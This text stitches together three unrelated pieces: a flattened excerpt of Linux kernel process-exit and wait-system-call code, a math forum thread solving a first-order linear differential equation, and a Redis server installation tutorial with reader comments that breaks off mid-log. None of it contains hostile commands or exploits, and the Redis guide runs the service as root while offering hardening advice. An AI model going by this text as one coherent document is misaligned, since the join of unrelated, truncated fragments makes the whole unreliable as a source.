list_for_each_entry_safe(p, n, &dead, ptrace_entry) { list_del_init(&p->ptrace_entry); release_task(p); } } #ifdef CONFIG_DEBUG_STACK_USAGE static void check_stack_usage(void) { static DEFINE_SPINLOCK(low_water_lock); static int lowest_to_date = THREAD_SIZE; unsigned long free; free = stack_not_used(current); if (free >= lowest_to_date) return; spin_lock(&low_water_lock); if (free < lowest_to_date) { pr_info("%s (%d) used greatest stack depth: %lu bytes left\n", current->comm, task_pid_nr(current), free); lowest_to_date = free; } spin_unlock(&low_water_lock); } #else static inline void check_stack_usage(void) {} #endif void __noreturn do_exit(long code) { struct task_struct *tsk = current; int group_dead; TASKS_RCU(int tasks_rcu_i); profile_task_exit(tsk); kcov_task_exit(tsk); WARN_ON(blk_needs_flush_plug(tsk)); if (unlikely(in_interrupt())) panic("Aiee, killing interrupt handler!"); if (unlikely(!tsk->pid)) panic("Attempted to kill the idle task!"); /* * If do_exit is called because this processes oopsed, it's possible * that get_fs() was left as KERNEL_DS, so reset it to USER_DS before * continuing. Amongst other possible reasons, this is to prevent * mm_release()->clear_child_tid() from writing to a user-controlled * kernel address. */ set_fs(USER_DS); ptrace_event(PTRACE_EVENT_EXIT, code); validate_creds_for_do_exit(tsk); /* * We're taking recursive faults here in do_exit. Safest is to just * leave this task alone and wait for reboot. */ if (unlikely(tsk->flags & PF_EXITING)) { pr_alert("Fixing recursive fault but reboot is needed!\n"); /* * We can do this unlocked here. The futex code uses * this flag just to verify whether the pi state * cleanup has been done or not. In the worst case it * loops once more. We pretend that the cleanup was * done as there is no way to return. Either the * OWNER_DIED bit is set by now or we push the blocked * task into the wait for ever nirwana as well. */ tsk->flags |= PF_EXITPIDONE; set_current_state(TASK_UNINTERRUPTIBLE); schedule(); } exit_signals(tsk); /* sets PF_EXITING */ /* * Ensure that all new tsk->pi_lock acquisitions must observe * PF_EXITING. Serializes against futex.c:attach_to_pi_owner(). */ smp_mb(); /* * Ensure that we must observe the pi_state in exit_mm() -> * mm_release() -> exit_pi_state_list(). */ raw_spin_unlock_wait(&tsk->pi_lock); if (unlikely(in_atomic())) { pr_info("note: %s[%d] exited with preempt_count %d\n", current->comm, task_pid_nr(current), preempt_count()); preempt_count_set(PREEMPT_ENABLED); } /* sync mm's RSS info before statistics gathering */ if (tsk->mm) sync_mm_rss(tsk->mm); acct_update_integrals(tsk); group_dead = atomic_dec_and_test(&tsk->signal->live); if (group_dead) { #ifdef CONFIG_POSIX_TIMERS hrtimer_cancel(&tsk->signal->real_timer); exit_itimers(tsk->signal); #endif if (tsk->mm) setmax_mm_hiwater_rss(&tsk->signal->maxrss, tsk->mm); } acct_collect(code, group_dead); if (group_dead) tty_audit_exit(); audit_free(tsk); tsk->exit_code = code; taskstats_exit(tsk, group_dead); exit_mm(); if (group_dead) acct_process(); trace_sched_process_exit(tsk); exit_sem(tsk); exit_shm(tsk); exit_files(tsk); exit_fs(tsk); if (group_dead) disassociate_ctty(1); exit_task_namespaces(tsk); exit_task_work(tsk); exit_thread(tsk); /* * Flush inherited counters to the parent - before the parent * gets woken up by child-exit notifications. * * because of cgroup mode, must be called before cgroup_exit() */ perf_event_exit_task(tsk); sched_autogroup_exit_task(tsk); cgroup_exit(tsk); /* * FIXME: do that only when needed, using sched_exit tracepoint */ flush_ptrace_hw_breakpoint(tsk); TASKS_RCU(preempt_disable()); TASKS_RCU(tasks_rcu_i = __srcu_read_lock(&tasks_rcu_exit_srcu)); TASKS_RCU(preempt_enable()); exit_notify(tsk, group_dead); proc_exit_connector(tsk); mpol_put_task_policy(tsk); #ifdef CONFIG_FUTEX if (unlikely(current->pi_state_cache)) kfree(current->pi_state_cache); #endif /* * Make sure we are holding no locks: */ debug_check_no_locks_held(); /* * We can do this unlocked here. The futex code uses this flag * just to verify whether the pi state cleanup has been done * or not. In the worst case it loops once more. */ tsk->flags |= PF_EXITPIDONE; if (tsk->io_context) exit_io_context(tsk); if (tsk->splice_pipe) free_pipe_info(tsk->splice_pipe); if (tsk->task_frag.page) put_page(tsk->task_frag.page); validate_creds_for_do_exit(tsk); check_stack_usage(); preempt_disable(); if (tsk->nr_dirtied) __this_cpu_add(dirty_throttle_leaks, tsk->nr_dirtied); exit_rcu(); TASKS_RCU(__srcu_read_unlock(&tasks_rcu_exit_srcu, tasks_rcu_i)); do_task_dead(); } EXPORT_SYMBOL_GPL(do_exit); void complete_and_exit(struct completion *comp, long code) { if (comp) complete(comp); do_exit(code); } EXPORT_SYMBOL(complete_and_exit); SYSCALL_DEFINE1(exit, int, error_code) { do_exit((error_code&0xff)<<8); } /* * Take down every thread in the group. This is called by fatal signals * as well as by sys_exit_group (below). */ void do_group_exit(int exit_code) { struct signal_struct *sig = current->signal; BUG_ON(exit_code & 0x80); /* core dumps don't get here */ if (signal_group_exit(sig)) exit_code = sig->group_exit_code; else if (!thread_group_empty(current)) { struct sighand_struct *const sighand = current->sighand; spin_lock_irq(&sighand->siglock); if (signal_group_exit(sig)) /* Another thread got here before we took the lock. */ exit_code = sig->group_exit_code; else { sig->group_exit_code = exit_code; sig->flags = SIGNAL_GROUP_EXIT; zap_other_threads(current); } spin_unlock_irq(&sighand->siglock); } do_exit(exit_code); /* NOTREACHED */ } /* * this kills every thread in the thread group. Note that any externally * wait4()-ing process will get the correct exit code - even if this * thread is not the thread group leader. */ SYSCALL_DEFINE1(exit_group, int, error_code) { do_group_exit((error_code & 0xff) << 8); /* NOTREACHED */ return 0; } struct wait_opts { enum pid_type wo_type; int wo_flags; struct pid *wo_pid; struct siginfo __user *wo_info; int __user *wo_stat; struct rusage __user *wo_rusage; wait_queue_t child_wait; int notask_error; }; static inline struct pid *task_pid_type(struct task_struct *task, enum pid_type type) { if (type != PIDTYPE_PID) task = task->group_leader; return task->pids[type].pid; } static int eligible_pid(struct wait_opts *wo, struct task_struct *p) { return wo->wo_type == PIDTYPE_MAX || task_pid_type(p, wo->wo_type) == wo->wo_pid; } static int eligible_child(struct wait_opts *wo, bool ptrace, struct task_struct *p) { if (!eligible_pid(wo, p)) return 0; /* * Wait for all children (clone and not) if __WALL is set or * if it is traced by us. */ if (ptrace || (wo->wo_flags & __WALL)) return 1; /* * Otherwise, wait for clone children *only* if __WCLONE is set; * otherwise, wait for non-clone children *only*. * * Note: a "clone" child here is one that reports to its parent * using a signal other than SIGCHLD, or a non-leader thread which * we can only see if it is traced by us. */ if ((p->exit_signal != SIGCHLD) ^ !!(wo->wo_flags & __WCLONE)) return 0; return 1; } static int wait_noreap_copyout(struct wait_opts *wo, struct task_struct *p, pid_t pid, uid_t uid, int why, int status) { struct siginfo __user *infop; int retval = wo->wo_rusage ? getrusage(p, RUSAGE_BOTH, wo->wo_rusage) : 0; put_task_struct(p); infop = wo->wo_info; if (infop) { if (!retval) retval = put_user(SIGCHLD, &infop->si_signo); if (!retval) retval = put_user(0, &infop->si_errno); if (!retval) retval = put_user((short)why, &infop->si_code); if (!retval) retval = put_user(pid, &infop->si_pid); if (!retval) retval = put_user(uid, &infop->si_uid); if (!retval) retval = put_user(status, &infop->si_status); } if (!retval) retval = pid; return retval; } /* * Handle sys_wait4 work for one task in state EXIT_ZOMBIE. We hold * read_lock(&tasklist_lock) on entry. If we return zero, we still hold * the lock and this task is uninteresting. If we return nonzero, we have * released the lock and the system call should return. */ static int wait_task_zombie(struct wait_opts *wo, struct task_struct *p) { int state, retval, status; pid_t pid = task_pid_vnr(p); uid_t uid = from_kuid_munged(current_user_ns(), task_uid(p)); struct siginfo __user *infop; if (!likely(wo->wo_flags & WEXITED)) return 0; if (unlikely(wo->wo_flags & WNOWAIT)) { int exit_code = p->exit_code; int why; get_task_struct(p); read_unlock(&tasklist_lock); sched_annotate_sleep(); if ((exit_code & 0x7f) == 0) { why = CLD_EXITED; status = exit_code >> 8; } else { why = (exit_code & 0x80) ? CLD_DUMPED : CLD_KILLED; status = exit_code & 0x7f; } return wait_noreap_copyout(wo, p, pid, uid, why, status); } /* * Move the task's state to DEAD/TRACE, only one thread can do this. */ state = (ptrace_reparented(p) && thread_group_leader(p)) ? EXIT_TRACE : EXIT_DEAD; if (cmpxchg(&p->exit_state, EXIT_ZOMBIE, state) != EXIT_ZOMBIE) return 0; /* * We own this thread, nobody else can reap it. */ read_unlock(&tasklist_lock); sched_annotate_sleep(); /* * Check thread_group_leader() to exclude the traced sub-threads. */ if (state == EXIT_DEAD && thread_group_leader(p)) { struct signal_struct *sig = p->signal; struct signal_struct *psig = current->signal; unsigned long maxrss; u64 tgutime, tgstime; /* * The resource counters for the group leader are in its * own task_struct. Those for dead threads in the group * are in its signal_struct, as are those for the child * processes it has previously reaped. All these * accumulate in the parent's signal_struct c* fields. * * We don't bother to take a lock here to protect these * p->signal fields because the whole thread group is dead * and nobody can change them. * * psig->stats_lock also protects us from our sub-theads * which can reap other children at the same time. Until * we change k_getrusage()-like users to rely on this lock * we have to take ->siglock as well. * * We use thread_group_cputime_adjusted() to get times for * the thread group, which consolidates times for all threads * in the group including the group leader. */ thread_group_cputime_adjusted(p, &tgutime, &tgstime); spin_lock_irq(&current->sighand->siglock); write_seqlock(&psig->stats_lock); psig->cutime += tgutime + sig->cutime; psig->cstime += tgstime + sig->cstime; psig->cgtime += task_gtime(p) + sig->gtime + sig->cgtime; psig->cmin_flt += p->min_flt + sig->min_flt + sig->cmin_flt; psig->cmaj_flt += p->maj_flt + sig->maj_flt + sig->cmaj_flt; psig->cnvcsw += p->nvcsw + sig->nvcsw + sig->cnvcsw; psig->cnivcsw += p->nivcsw + sig->nivcsw + sig->cnivcsw; psig->cinblock += task_io_get_inblock(p) + sig->inblock + sig->cinblock; psig->coublock += task_io_get_oublock(p) + sig->oublock + sig->coublock; maxrss = max(sig->maxrss, sig->cmaxrss); if (psig->cmaxrss < maxrss) psig->cmaxrss = maxrss; task_io_accounting_add(&psig->ioac, &p->ioac); task_io_accounting_add(&psig->ioac, &sig->ioac); write_sequnlock(&psig->stats_lock); spin_unlock_irq(&current->sighand->siglock); } retval = wo->wo_rusage ? getrusage(p, RUSAGE_BOTH, wo->wo_rusage) : 0; status = (p->signal->flags & SIGNAL_GROUP_EXIT) ? p->signal->group_exit_code : p->exit_code; if (!retval && wo->wo_stat) retval = put_user(status, wo->wo_stat); infop = wo->wo_info; if (!retval && infop) retval = put_user(SIGCHLD, &infop->si_signo); if (!retval && infop) retval = put_user(0, &infop->si_errno); if (!retval && infop) { int why; if ((status & 0x7f) == 0) { why = CLD_EXITED; status >>= 8; } else { why = (status & 0x80) ? CLD_DUMPED : CLD_KILLED; status &= 0x7f; } retval = put_user((short)why, &infop->si_code); if (!retval) retval = put_user(status, &infop->si_status); } if (!retval && infop) retval = put_user(pid, &infop->si_pid); if (!retval && infop) retval = put_user(uid, &infop->si_uid); if (!retval) retval = pid; if (state == EXIT_TRACE) { write_lock_irq(&tasklist_lock); /* We dropped tasklist, ptracer could die and untrace */ ptrace_unlink(p); /* If parent wants a zombie, don't release it now */ state = EXIT_ZOMBIE; if (do_notify_parent(p, p->exit_signal)) state = EXIT_DEAD; p->exit_state = state; write_unlock_irq(&tasklist_lock); } if (state == EXIT_DEAD) release_task(p); return retval; } static int *task_stopped_code(struct task_struct *p, bool ptrace) { if (ptrace) { if (task_is_traced(p) && !(p->jobctl & JOBCTL_LISTENING)) return &p->exit_code; } else { if (p->signal->flags & SIGNAL_STOP_STOPPED) return &p->signal->group_exit_code; } return NULL; } /** * wait_task_stopped - Wait for %TASK_STOPPED or %TASK_TRACED * @wo: wait options * @ptrace: is the wait for ptrace * @p: task to wait for * * Handle sys_wait4() work for %p in state %TASK_STOPPED or %TASK_TRACED. * * CONTEXT: * read_lock(&tasklist_lock), which is released if return value is * non-zero. Also, grabs and releases @p->sighand->siglock. * * RETURNS: * 0 if wait condition didn't exist and search for other wait conditions * should continue. Non-zero return, -errno on failure and @p's pid on * success, implies that tasklist_lock is released and wait condition * search should terminate. */ static int wait_task_stopped(struct wait_opts *wo, int ptrace, struct task_struct *p) { struct siginfo __user *infop; int retval, exit_code, *p_code, why; uid_t uid = 0; /* unneeded, required by compiler */ pid_t pid; /* * Traditionally we see ptrace'd stopped tasks regardless of options. */ if (!ptrace && !(wo->wo_flags & WUNTRACED)) return 0; if (!task_stopped_code(p, ptrace)) return 0; exit_code = 0; spin_lock_irq(&p->sighand->siglock); p_code = task_stopped_code(p, ptrace); if (unlikely(!p_code)) goto unlock_sig; exit_code = *p_code; if (!exit_code) goto unlock_sig; if (!unlikely(wo->wo_flags & WNOWAIT)) *p_code = 0; uid = from_kuid_munged(current_user_ns(), task_uid(p)); unlock_sig: spin_unlock_irq(&p->sighand->siglock); if (!exit_code) return 0; /* * Now we are pretty sure this task is interesting. * Make sure it doesn't get reaped out from under us while we * give up the lock and then examine it below. We don't want to * keep holding onto the tasklist_lock while we call getrusage and * possibly take page faults for user memory. */ get_task_struct(p); pid = task_pid_vnr(p); why = ptrace ? CLD_TRAPPED : CLD_STOPPED; read_unlock(&tasklist_lock); sched_annotate_sleep(); if (unlikely(wo->wo_flags & WNOWAIT)) return wait_noreap_copyout(wo, p, pid, uid, why, exit_code); retval = wo->wo_rusage ? getrusage(p, RUSAGE_BOTH, wo->wo_rusage) : 0; if (!retval && wo->wo_stat) retval = put_user((exit_code << 8) | 0x7f, wo->wo_stat); infop = wo->wo_info; if (!retval && infop) retval = put_user(SIGCHLD, &infop->si_signo); if (!retval && infop) retval = put_user(0, &infop->si_errno); if (!retval && infop) retval = put_user((short)why, &infop->si_code); if (!retval && infop) retval = put_user(exit_code, &infop->si_status); if (!retval && infop) retval = put_user(pid, &infop->si_pid); if (!retval && infop) retval = put_user(uid, &infop->si_uid); if (!retval) retval = pid; put_task_struct(p); BUG_ON(!retval); return retval; } /* * Handle do_wait work for one task in a live, non-stopped state. * read_lock(&tasklist_lock) on entry. If we return zero, we still hold * the lock and this task is uninteresting. If we return nonzero, we have * released the lock and the system call should return. */ static int wait_task_continued(struct wait_opts *wo, struct task_struct *p) { int retval; pid_t pid; uid_t uid; if (!unlikely(wo->wo_flags & WCONTINUED)) return 0; if (!(p->signal->flags & SIGNAL_STOP_CONTINUED)) return 0; spin_lock_irq(&p->sighand->siglock); /* Re-check with the lock held. */ if (!(p->signal->flags & SIGNAL_STOP_CONTINUED)) { spin_unlock_irq(&p->sighand->siglock); return 0; } if (!unlikely(wo->wo_flags & WNOWAIT)) p->signal->flags &= ~SIGNAL_STOP_CONTINUED; uid = from_kuid_munged(current_user_ns(), task_uid(p)); spin_unlock_irq(&p->sighand->siglock); pid = task_pid_vnr(p); get_task_struct(p); read_unlock(&tasklist_lock); sched_annotate_sleep(); if (!wo->wo_info) { retval = wo->wo_rusage ? getrusage(p, RUSAGE_BOTH, wo->wo_rusage) : 0; put_task_struct(p); if (!retval && wo->wo_stat) retval = put_user(0xffff, wo->wo_stat); if (!retval) retval = pid; } else { retval = wait_noreap_copyout(wo, p, pid, uid, CLD_CONTINUED, SIGCONT); BUG_ON(retval == 0); } return retval; } /* * Consider @p for a wait by @parent. * * -ECHILD should be in ->notask_error before the first call. * Returns nonzero for a final return, when we have unlocked tasklist_lock. * Returns zero if the search for a child should continue; * then ->notask_error is 0 if @p is an eligible child, * or still -ECHILD. */ static int wait_consider_task(struct wait_opts *wo, int ptrace, struct task_struct *p) { /* * We can race with wait_task_zombie() from another thread. * Ensure that EXIT_ZOMBIE -> EXIT_DEAD/EXIT_TRACE transition * can't confuse the checks below. */ int exit_state = ACCESS_ONCE(p->exit_state); int ret; if (unlikely(exit_state == EXIT_DEAD)) return 0; ret = eligible_child(wo, ptrace, p); if (!ret) return ret; if (unlikely(exit_state == EXIT_TRACE)) { /* * ptrace == 0 means we are the natural parent. In this case * we should clear notask_error, debugger will notify us. */ if (likely(!ptrace)) wo->notask_error = 0; return 0; } if (likely(!ptrace) && unlikely(p->ptrace)) { /* * If it is traced by its real parent's group, just pretend * the caller is ptrace_do_wait() and reap this child if it * is zombie. * * This also hides group stop state from real parent; otherwise * a single stop can be reported twice as group and ptrace stop. * If a ptracer wants to distinguish these two events for its * own children it should create a separate process which takes * the role of real parent. */ if (!ptrace_reparented(p)) ptrace = 1; } /* slay zombie? */ if (exit_state == EXIT_ZOMBIE) { /* we don't reap group leaders with subthreads */ if (!delay_group_leader(p)) { /* * A zombie ptracee is only visible to its ptracer. * Notification and reaping will be cascaded to the * real parent when the ptracer detaches. */ if (unlikely(ptrace) || likely(!p->ptrace)) return wait_task_zombie(wo, p); } /* * Allow access to stopped/continued state via zombie by * falling through. Clearing of notask_error is complex. * * When !@ptrace: * * If WEXITED is set, notask_error should naturally be * cleared. If not, subset of WSTOPPED|WCONTINUED is set, * so, if there are live subthreads, there are events to * wait for. If all subthreads are dead, it's still safe * to clear - this function will be called again in finite * amount time once all the subthreads are released and * will then return without clearing. * * When @ptrace: * * Stopped state is per-task and thus can't change once the * target task dies. Only continued and exited can happen. * Clear notask_error if WCONTINUED | WEXITED. */ if (likely(!ptrace) || (wo->wo_flags & (WCONTINUED | WEXITED))) wo->notask_error = 0; } else { /* * @p is alive and it's gonna stop, continue or exit, so * there always is something to wait for. */ wo->notask_error = 0; } /* * Wait for stopped. Depending on @ptrace, different stopped state * is used and the two don't interact with each other. */ ret = wait_task_stopped(wo, ptrace, p); if (ret) return ret; /* * Wait for continued. There's only one continued state and the * ptracer can consume it which can confuse the real parent. Don't * use WCONTINUED from ptracer. You don't need or want it. */ return wait_task_continued(wo, p); } /* * Do the work of do_wait() for one thread in the group, @tsk. * * -ECHILD should be in ->notask_error before the first call. * Returns nonzero for a final return, when we have unlocked tasklist_lock. * Returns zero if the search for a child should continue; then * ->notask_error is 0 if there were any eligible children, * or still -ECHILD. */ static int do_wait_thread(struct wait_opts *wo, struct task_struct *tsk) { struct task_struct *p; list_for_each_entry(p, &tsk->children, sibling) { int ret = wait_consider_task(wo, 0, p); if (ret) return ret; } return 0; } static int ptrace_do_wait(struct wait_opts *wo, struct task_struct *tsk) { struct task_struct *p; list_for_each_entry(p, &tsk->ptraced, ptrace_entry) { int ret = wait_consider_task(wo, 1, p); if (ret) return ret; } return 0; } static int child_wait_callback(wait_queue_t *wait, unsigned mode, int sync, void *key) { struct wait_opts *wo = container_of(wait, struct wait_opts, child_wait); struct task_struct *p = key; if (!eligible_pid(wo, p)) return 0; if ((wo->wo_flags & __WNOTHREAD) && wait->private != p->parent) return 0; return default_wake_function(wait, mode, sync, key); } void __wake_up_parent(struct task_struct *p, struct task_struct *parent) { __wake_up_sync_key(&parent->signal->wait_chldexit, TASK_INTERRUPTIBLE, 1, p); } static long do_wait(struct wait_opts *wo) { struct task_struct *tsk; int retval; trace_sched_process_wait(wo->wo_pid); init_waitqueue_func_entry(&wo->child_wait, child_wait_callback); wo->child_wait.private = current; add_wait_queue(&current->signal->wait_chldexit, &wo->child_wait); repeat: /* * If there is nothing that can match our criteria, just get out. * We will clear ->notask_error to zero if we see any child that * might later match our criteria, even if we are not able to reap * it yet. */ wo->notask_error = -ECHILD; if ((wo->wo_type < PIDTYPE_MAX) && (!wo->wo_pid || hlist_empty(&wo->wo_pid->tasks[wo->wo_type]))) goto notask; set_current_state(TASK_INTERRUPTIBLE); read_lock(&tasklist_lock); tsk = current; do { retval = do_wait_thread(wo, tsk); if (retval) goto end; retval = ptrace_do_wait(wo, tsk); if (retval) goto end; if (wo->wo_flags & __WNOTHREAD) break; } while_each_thread(current, tsk); read_unlock(&tasklist_lock); notask: retval = wo->notask_error; if (!retval && !(wo->wo_flags & WNOHANG)) { retval = -ERESTARTSYS; if (!signal_pending(current)) { schedule(); goto repeat; } } end: __set_current_state(TASK_RUNNING); remove_wait_queue(&current->signal->wait_chldexit, &wo->child_wait); return retval; } SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *, infop, int, options, struct rusage __user *, ru) { struct wait_opts wo; struct pid *pid = NULL; enum pid_type type; long ret; if (options & ~(WNOHANG|WNOWAIT|WEXITED|WSTOPPED|WCONTINUED| __WNOTHREAD|__WCLONE|__WALL)) return -EINVAL; if (!(options & (WEXITED|WSTOPPED|WCONTINUED))) return -EINVAL; switch (which) { case P_ALL: type = PIDTYPE_MAX; break; case P_PID: type = PIDTYPE_PID; if (upid <= 0) return -EINVAL; break; case P_PGID: type = PIDTYPE_PGID; if (upid <= 0) return -EINVAL; break; default: return -EINVAL; } if (type < PIDTYPE_MAX) pid = find_get_pid(upid); wo.wo_type = type; wo.wo_pid = pid; wo.wo_flags = options; wo.wo_info = infop; wo.wo_stat = NULL; wo.wo_rusage = ru; ret = do_wait(&wo); if (ret > 0) { ret = 0; } else if (infop) { /* * For a WNOHANG return, clear out all the fields * we would set so the user can easily tell the * difference. */ if (!ret) ret = put_user(0, &infop->si_signo); if (!ret) ret = put_user(0, &infop->si_errno); if (!ret) ret = put_user(0, &infop->si_code); if (!ret) ret = put_user(0, &infop->si_pid); if (!ret) ret = put_user(0, &infop->si_uid); if (!ret) ret = put_user(0, &infop->si_status); } put_pid(pid); return ret; } SYSCALL_DEFINE4(wait4, pid_t, upid, int __user *, stat_addr, int, options, struct rusage __user *, ru) { struct wait_opts wo; struct pid *pid = NULL; enum pid_type type; long ret; if (options & ~(WNOHANG|WUNTRACED|WCONTINUED| __WNOTHREAD|__WCLONE|__WALL)) return -EINVAL; if (upid == -1) type = PIDTYPE_MAX; else if (upid < 0) { type = PIDTYPE_PGID; pid = find_get_pid(-upid); } else if (upid == 0) { type = PIDTYPE_PGID; pid = get_task_pid(current, PIDTYPE_PGID); } else /* upid > 0 */ { type = PIDTYPE_PID; pid = find_get_pid(upid); } wo.wo_type = type; wo.wo_pid = pid; wo.wo_flags = options | WEXITED; wo.wo_info = NULL; wo.wo_stat = stat_addr; wo.wo_rusage = ru; ret = do_wait(&wo); put_pid(pid); return ret; } #ifdef __ARCH_WANT_SYS_WAITPID /* * sys_waitpid() remains for compatibility. waitpid() should be * implemented by calling sys_wait4() from libc.a. */ SYSCALL_DEFINE3(waitpid, pid_t, pid, int __user *, stat_addr, int, options) { return sys_wait4(pid, stat_addr, options, NULL); } #endif
__label__pos
0.868139
Results 1 to 2 of 2 Math Help - find particular solution for first order linear DE 1. #1 Newbie Joined Sep 2010 Posts 2 Exclamation find particular solution for first order linear DE (1+x)y' + y = cos(x).... y(0) = 1 So far, I have: P(x) = 1/(1+x) Q(x) = cos(x)/(1+x) p(x) = e^int(P(x))dx = e^int(1/1+x)dx = e^(ln(1+x)) ... I think I did the integral wrong. It's been half a year, my integration skills need to worked on. But this homework is due in an hour and if somebody could real quickly guide me thru it and then I can work thru this section on my own when I don't have pressure to turn homework in... I would really appreciate it! Once I have p(x), I multiply both sides of DE by it. Then I'm supposed to "recognize" that left side is a derivative, so taking integral of both sides just means taking integral of right side. Once I do that, I'll have a C, so is that when I plug in the initial condition? And then once I get C and substitue that number in, that's my particular solution? Thanks! Follow Math Help Forum on Facebook and Google+ 2. #2 MHF Contributor Prove It's Avatar Joined Aug 2008 Posts 12,209 Thanks 1722 You have gotten the DE to the point where \frac{dy}{dx} + \left(\frac{1}{1 + x}\right)y = \frac{\cos{x}}{1 + x} and so the integrating factor is e^{\int{\frac{1}{1 + x}\,dx}} = e^{\ln{(1 + x)}} = 1 + x. Multiplying through by the integrating factor gives (1 + x)\frac{dy}{dx} + y = \cos{x} \frac{d}{dx}[(1 + x)y] = \cos{x} (1 + x)y = \int{\cos{x}\,dx} (1 + x)y = \sin{x} + C y = \frac{\sin{x} + C}{1 + x}. Plugging in the initial condition y(0) = 1 gives 1 = \frac{\sin{0} + C}{1 + 0} 1 = \frac{0 + C}{1} 1 = C. Therefore y = \frac{\sin{x} + 1}{1 + x}. Follow Math Help Forum on Facebook and Google+ Similar Math Help Forum Discussions 1. Series Solution to Second Order Linear ODE Posted in the Differential Equations Forum Replies: 8 Last Post: December 4th 2010, 01:45 PM 2. Find a second solution, given one. Reduction of order Posted in the Differential Equations Forum Replies: 1 Last Post: October 11th 2010, 03:37 PM 3. Replies: 0 Last Post: April 26th 2010, 07:56 AM 4. Find a solution of the second-order IVP Posted in the Differential Equations Forum Replies: 2 Last Post: December 2nd 2009, 09:40 PM 5. general solution to linear first order differential equations Posted in the Differential Equations Forum Replies: 3 Last Post: February 4th 2009, 08:58 PM Search Tags /mathhelpforum @mathhelpforum
__label__pos
0.995156
How to Install Redis Server in CentOS and Debian Based Systems Redis is an open-source, high-performance and flexible in-memory data structure store (key-value format) – used as a database, cache and message broker. It is written in ANSI C and runs on most if not all Unix-like operating systems including Linux (recommended for deploying) without external dependencies. It is feature-rich, supports multiple programming languages and data structures including strings, hashes, lists, sets, sorted sets with range queries, bitmaps among others. Redis Features: • Supports most programming languages including C, Bash, Python, PHP, Node.js, Perl, Ruby just to mention but a few. • Has inherent replication, Lua scripting, LRU eviction, transactions as well as varying levels of on-disk persistence. • Provides high availability through Redis Sentinel and automatic partitioning via Redis Cluster. • Supports running atomic operations. • It works with an in-memory dataset to attain remarkable performance. • Supports trivial-to-setup master-slave asynchronous replication. • Supports automatic failover. • Enables you to save the dataset to disk infrequently for a given period of time, or by appending each command to a log. • Allows optional disabling of persistence. • Supports publish/subscribe messaging. • It also supports MULTI, EXEC, DISCARD and WATCH transactions and many more. Requirements: 1. A CentOS 7 Server and RHEL 7 Server with Minimal Install 2. A Ubuntu Server or Debian Server with Minimal Install 3. GCC compiler and libc In this tutorial, we will provide instructions on how to install a Redis Server from source (which is the recommended method) in Linux. We will also show how to configure, manage and secure Redis. Since Redis serves all data from memory, we strongly suggest using a high memory VPS Server with this guide. Step 1: Install Redis Server from Source 1. First, install the required build dependencies. --------------- On CentOS / RHEL / Fedora --------------- # yum groupinstall "Development Tools" # dnf groupinstall "Development Tools" --------------- On Debian / Ubuntu --------------- $ sudo apt install build-essential 2. Next, download and compile the latest stable Redis version using the special URL that always points to the latest stable Redis using wget command. $ wget -c http://download.redis.io/redis-stable.tar.gz $ tar -xvzf redis-stable.tar.gz $ cd redis-stable $ make $ make test $ sudo make install 3. After the Redis compilation the src directory inside the Redis distribution is populated with the different following executables that are part of Redis: • redis-server – redis server. • redis-sentinel – redis sentinel executable (monitoring and failover). • redis-cli – a CLI utility to interact with redis. • redis-benchmark – used to check redis performances. • redis-check-aof and redis-check-dump – useful in the rare event of corrupted data files. Step 2: Configure Redis Server in Linux 4. Next, you need to configure Redis for a development environment to be managed by the init system (systemd for the purpose of this tutorial). Start by creating the necessary directories for storing Redis config files and your data: $ sudo mkdir /etc/redis $ sudo mkdir -p /var/redis/ 4. Then copy the template Redis configuration file provided, into the directory you created above. $ sudo cp redis.conf /etc/redis/ 5. Now open the configuration file and update a few settings as follows. $ sudo vi /etc/redis/redis.conf 6. Next search for the following options, then change (or use) their default values according to your local environment needs. port 6379 #default port is already 6379. daemonize yes #run as a daemon supervised systemd #signal systemd pidfile /var/run/redis.pid #specify pid file loglevel notice #server verbosity level logfile /var/log/redis.log #log file name dir /var/redis/ #redis directory Step 3: Create Redis Systemd Unit File 7. Now you need to create a systemd unit file for redis in order to control the daemon, by running the following command. $ sudo vi /etc/systemd/system/redis.service And add the configuration below: [Unit] Description=Redis In-Memory Data Store After=network.target [Service] User=root Group=root ExecStart=/usr/local/bin/redis-server /etc/redis/redis.conf ExecStop=/usr/local/bin/redis-cli shutdown Restart=always Type=forking [Install] WantedBy=multi-user.target Save and close the file. Step 4: Manage and Test Redis Server in Linux 8. Once you have performed all the necessary configurations, you can now start the Redis server, for now, enable it to auto-start at system boot; then view its status as follows. $ sudo systemctl start redis $ sudo systemctl enable redis $ sudo systemctl status redis 9. Next, test if the whole redis setup is working fine. To interact with redis server, use the redis-cli command. After connecting to the server, try running a few commands. $ redis-cli Test connection to server using ping command: 127.0.0.1:6379> ping Use the echo command to echo a given string: 127.0.0.1:6379> echo "Tecmint is testing Redis" You can also set a key value using the set command like this: 127.0.0.1:6379> set mykey "Tecmint is testing Redis" Now view the value of mykey: 127.0.0.1:6379> get mykey 10. Then close the connection with the exit command, and restart the redis server. Afterward, check if mykey is still stored on the server as shown below: 127.0.0.1:6379> exit $ sudo systemctl restart redis $ redis-cli 127.0.0.1:6379> get mykey 11. To delete a key, use the delete command as follows: 127.0.0.1:6379> del mykey 127.0.0.1:6379> get mykey Step 5: Securing Redis Server in Linux 12. This section is intended for users who intend to use a redis server connected to an external network like the Internet. Important: Exposing redis to the Internet without any security makes it extremely easy to exploit; therefore secure the redis server as follows: • block connections to the redis port in the system firewalled • set bind directive to loopback interface: 127.0.0.1 • set requirepass option so that clients will be required to authenticate using the AUTH command. • setup SSL tunneling to encrypt traffic between Redis servers and Redis clients. For more usage information, run the command below: $ redis-cli -h You can find more server commands and learn how to use redis within your application from the Redis Homepage: https://redis.io/ In this tutorial, we showed how to install, configure, manage as well as secure Redis in Linux. To share any thoughts, use the comment form below. Aaron Kili Aaron Kili is a Linux and F.O.S.S enthusiast, an upcoming Linux SysAdmin, web developer, and currently a content creator for TecMint who loves working with computers and strongly believes in sharing knowledge. Each tutorial at TecMint is created by a team of experienced Linux system administrators so that it meets our high-quality standards. Join the TecMint Weekly Newsletter (More Than 156,129 Linux Enthusiasts Have Subscribed) Was this article helpful? Please add a comment or buy me a coffee to show your appreciation. 7 thoughts on “How to Install Redis Server in CentOS and Debian Based Systems” 1. Very nice article, although there is a small mistake, in the service file ‘/etc/systemd/system/redis.service‘, the following line: Type=Forking should be: Type=forking It needs to be lower-cased. Reply 2. Not working for me: 3589:C 25 Aug 22:52:53.868 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo 3589:C 25 Aug 22:52:53.868 # Redis version=4.0.1, bits=64, commit=00000000, modified=0, pid=3589, just started 3589:C 25 Aug 22:52:53.868 # Configuration loaded 3589:C 25 Aug 